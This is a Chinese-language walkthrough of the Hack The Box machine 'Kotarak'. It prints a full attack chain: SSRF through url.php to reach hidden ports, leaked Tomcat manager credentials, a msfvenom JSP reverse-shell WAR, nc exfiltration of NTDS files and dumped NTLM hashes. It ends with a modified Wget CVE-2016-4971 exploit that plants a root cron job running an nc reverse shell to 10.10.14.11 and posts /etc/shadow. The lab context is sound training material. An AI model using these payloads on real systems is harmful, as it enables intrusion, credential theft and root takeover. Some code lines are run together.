hackthebox- kotarak（考点：信息搜集隐藏端口 tom 上传域文件解析 wget-gnu 1.16提权）

1扫描搜集

普通nmap -A 扫。8009打不开，8080是汤姆猫，但是没密码。
没有多少价值信息，很可能端口扫描不全，于是速度版全端口再扫

masscan -p1-65535,U:1-65535 10.10.10.55 --rate=1000 -e tun0

多出来60000.进这个端口看，是个读任意http网页的搜索框工具。

dirbuster扫60000下的目录，看到有server status
通过搜索框，查看自己网站的server status

127.0.0.1:60000/server-status

发现靶机有不对外的888端口运行。这里也学到了思路，以后渗透多想想，是否有不对外的端口？

或者用wfuzz检查可能的不对外端口。 --h1=2是后来加上去用来屏蔽无效结果的。发现不对外的还有好几个。一个个点进去看。

不过似乎就888有料。可以看到有backup备份资料。

C:\root> wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.55:60000/url.php?path=http://localhost:FUZZWarning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************Target: http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
Total requests: 65535===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================000000022:   200        4 L      4 W      62 Ch       "22"
000000090:   200        11 L     18 W     156 Ch      "90"
000000110:   200        17 L     24 W     187 Ch      "110"
000000200:   200        3 L      2 W      22 Ch       "200"
000000320:   200        26 L     109 W    1232 Ch     "320"
000000888:   200        78 L     265 W    3955 Ch     "888"

2 隐藏端口拿密码

虽然文件大小不是0，说明有内容。但是我点进去看没东西。倒是可以看到目录是?doc=backup。
重新回到那个搜索框,用搜索框试各种.都不行。都是空白

http://localhost:888/?doc=backup
http://localhost:888/doc=backup
http://localhost:888?doc=backup

但是第三个，虽然网页上没有，但是网页的网址记下来，我却可以用curl试出来，倒是可以显示内容和密码了。搞不懂。。？？？？？

C:\root> curl http://10.10.10.55:60000/url.php?path=http%3A%2F%2Flocalhost%3A888%3Fdoc%3Dbackup
<?xml version="1.0" encoding="UTF-8"?>
<!--Licensed to the Apache Software Foundation (ASF) under one or morecontributor license agreements.  See the NOTICE file distributed withthis work for additional information regarding copyright ownership.The ASF licenses this file to You under the Apache License, Version 2.0(the "License"); you may not use this file except in compliance withthe License.  You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, softwaredistributed under the License is distributed on an "AS IS" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.See the License for the specific language governing permissions andlimitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"version="1.0">
<!--NOTE:  By default, no user is included in the "manager-gui" role requiredto operate the "/manager/html" web application.  If you wish to use this app,you must define such a user - the username and password are arbitrary. It isstrongly recommended that you do NOT use one of the users in the commented outsection below since they are intended for use with the examples webapplication.
-->
<!--NOTE:  The sample user and role entries below are intended for use with theexamples web application. They are wrapped in a comment and thus are ignoredwhen reading this file. If you wish to configure these users for use with theexamples web application, do not forget to remove the <!.. ..> that surroundsthem. You will also need to set the passwords to something appropriate.
-->
<!--<role rolename="tomcat"/><role rolename="role1"/><user username="tomcat" password="<must-be-changed>" roles="tomcat"/><user username="both" password="<must-be-changed>" roles="tomcat,role1"/><user username="role1" password="<must-be-changed>" roles="role1"/>
--><user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/></tomcat-users>C:\root>

3 TOM 拿shell

有了账号密码，可以登录之前我们进不去的汤姆猫了，登录地址也给了是manager/html
,tom猫的渗透可以参考hackthebox的这篇靶机jerry。tom猫现实中挺常见的，前几天还有朋友实战中遇到了tom问我怎么拿呢。。

上传，做包

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.11 LPORT=443 -f war > tom.war

传后点击自己的包，开监听，收到
tty python -c 'import pty; pty.spawn("/bin/bash")'

可以看到有atanas用户，user txt在里面，我们没权限拿
在tomcat 的home目录下，可以看到bin和dit文件

两个都用nc拷到本机来,本机接收。随便命名

nc 10.10.14.11 4444 < 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin

nc -nlvp 4444 > 666.bin

4 域文件解析

这两个是域文件，存储了域信息，
可以用kali自带的工具解impacket-secretsdump -system 666.bin -ntds 666.dit LOCAL

C:\root> impacket-secretsdump -system 666.bin -ntds 666.dit LOCAL
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation[*] Target system bootKey: 0x14b6fb98fedc8e15107867c4722d1399
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d77ec2af971436bccb3b6fc4a969d7ff
[*] Reading and decrypting hashes from 666.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

整理hash

Administrator:e64fe0f24ba2489c05e64354d74ebd11
krbtgt:ca1ccefcb525db49828fbb9d68298eee
atanas:2b576acbe6bcfda7294d6bd18041b8fe

https://crackstation.net/ 习惯先去这个网站解，比较快，不过要开那个网络，你懂的。也可以用john hashcat等解

admin和atan的可解出来。但是试了只有admin的可以用来切换atanas ，切换至ata用户

5 提权

在root目录里发现这个wget传送记录。是10.0.3.133来这个靶机调文件
ifconfig发现133是局域网的另一个网段10.0.3下的一个ip

atanas@kotarak-dmz:/root$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:2a:2d  inet addr:10.10.10.55  Bcast:10.10.10.255  Mask:255.255.255.0inet6 addr: fe80::250:56ff:feb9:2a2d/64 Scope:Linkinet6 addr: dead:beef::250:56ff:feb9:2a2d/64 Scope:GlobalUP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1RX packets:2680682 errors:0 dropped:57 overruns:0 frame:0TX packets:2211241 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000 RX bytes:452911965 (452.9 MB)  TX bytes:443481152 (443.4 MB)lo        Link encap:Local Loopback  inet addr:127.0.0.1  Mask:255.0.0.0inet6 addr: ::1/128 Scope:HostUP LOOPBACK RUNNING  MTU:65536  Metric:1RX packets:160637 errors:0 dropped:0 overruns:0 frame:0TX packets:160637 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1 RX bytes:11440611 (11.4 MB)  TX bytes:11440611 (11.4 MB)lxcbr0    Link encap:Ethernet  HWaddr 00:16:3e:00:00:00  inet addr:10.0.3.1  Bcast:0.0.0.0  Mask:255.255.255.0inet6 addr: fe80::216:3eff:fe00:0/64 Scope:LinkUP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1RX packets:903 errors:0 dropped:0 overruns:0 frame:0TX packets:850 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000 RX bytes:51717 (51.7 KB)  TX bytes:56116 (56.1 KB)

atanas@kotarak-dmz:/home$ cd /root
atanas@kotarak-dmz:/root$ ls
app.log  flag.txt
atanas@kotarak-dmz:/root$ cat app.log
10.0.3.133 - - [20/Jul/2017:22:48:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:50:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:52:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
atanas@kotarak-dmz:/root$

每两分钟来调文件，可以想到这就是cron job 一般就是由root在执行的

而wget-gnu 1.16可以搜到漏洞
这里漏洞.因此可以利用这个漏洞来提权

这个漏洞大体思路是利用FTP服务重定向，它取靶机的archive文件404找不到，我们可以利用脚本让它重定向我们本机kali开启的ftp服务，调走我们伪造的恶意.wgetrc配置，然后执行我们造的恶意cronjob代码。

首先跟着漏洞文档里步骤来。我们kali本机造恶意配置。再安装pip install pyftpdlib，再开启服务python -m pyftpdlib -p21

C:\root\Downloads> mkdir /tmp/ftptest
C:\root\Downloads> cd /tmp/ftptest
C:\tmp\ftptest> ls
C:\tmp\ftptest> cat <<_EOF_>.wgetrc
> post_file = /etc/shadow
> output_document = /etc/cron.d/wget-root-shell
> _EOF_
C:\tmp\ftptest> pip install pyftpdlib
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting pyftpdlibDownloading pyftpdlib-1.5.6.tar.gz (188 kB)|████████████████████████████████| 188 kB 4.9 kB/s
Building wheels for collected packages: pyftpdlibBuilding wheel for pyftpdlib (setup.py) ... doneCreated wheel for pyftpdlib: filename=pyftpdlib-1.5.6-py2-none-any.whl size=125597 sha256=9b90fada9d9a45ae96642c815d714446bbb69e4e3d6b07863034d7b92c492f61Stored in directory: /root/.cache/pip/wheels/31/10/b5/c6b2f04e18f1227d0dc45062815ad52ed359ec2e8d6c0faa55
Successfully built pyftpdlib
Installing collected packages: pyftpdlib
Successfully installed pyftpdlib-1.5.6
WARNING: You are using pip version 20.0.2; however, version 20.1 is available.
You should consider upgrading via the '/usr/bin/python -m pip install --upgrade pip' command.
C:\tmp\ftptest> cat .wgetrc
post_file = /etc/shadow
output_document = /etc/cron.d/wget-root-shell
C:\tmp\ftptest> python -m pyftpdlib -p21

修改漏洞文档里的脚本，换成cron job弹shell代码rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 5555 >/tmp/f。以及修改监听ip ：ftp host那里改成自己的

#!/usr/bin/env python
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971
#import SimpleHTTPServer
import SocketServer
import socket;class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):def do_GET(self):# This takes care of sending .wgetrcprint "We have a volunteer requesting " + self.path + " by GET :)\n"if "Wget" not in self.headers.getheader('User-Agent'):print "But it's not a Wget :( \n"self.send_response(200)self.end_headers()self.wfile.write("Nothing to see here...")returnprint "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"self.send_response(301)new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )print "Sending redirect to %s \n"%(new_path)self.send_header('Location', new_path)self.end_headers()def do_POST(self):# In here we will receive extracted file and install a PoC cronjobprint "We have a volunteer requesting " + self.path + " by POST :)\n"if "Wget" not in self.headers.getheader('User-Agent'):print "But it's not a Wget :( \n"self.send_response(200)self.end_headers()self.wfile.write("Nothing to see here...")returncontent_len = int(self.headers.getheader('content-length', 0))post_body = self.rfile.read(content_len)print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)print "Sending back a cronjob script as a thank-you for the file..." print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"self.send_response(200)self.send_header('Content-type', 'text/plain')self.end_headers()self.wfile.write(ROOT_CRON)print "\nFile was served. Check your root hash receiving in your 8888 web server in a minute! :) \n"returnHTTP_LISTEN_IP = '10.0.3.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '10.10.14.11'
FTP_PORT = 21ROOT_CRON = "* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 5555 >/tmp/f \n"handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)print "Ready? Is your FTP server running?"sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:print "FTP is down :( Exiting."exit(1)print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORThandler.serve_forever()

把这个脚本传输到靶机。
执行但是没权限，因为非root不能调用1024以下的端口。可以用authbind绕过，刚好靶机也装了。

atanas@kotarak-dmz:/root$ chmod 777 wget.py
atanas@kotarak-dmz:/root$ authbind python wget.py

开启监听。2分钟后成功收到root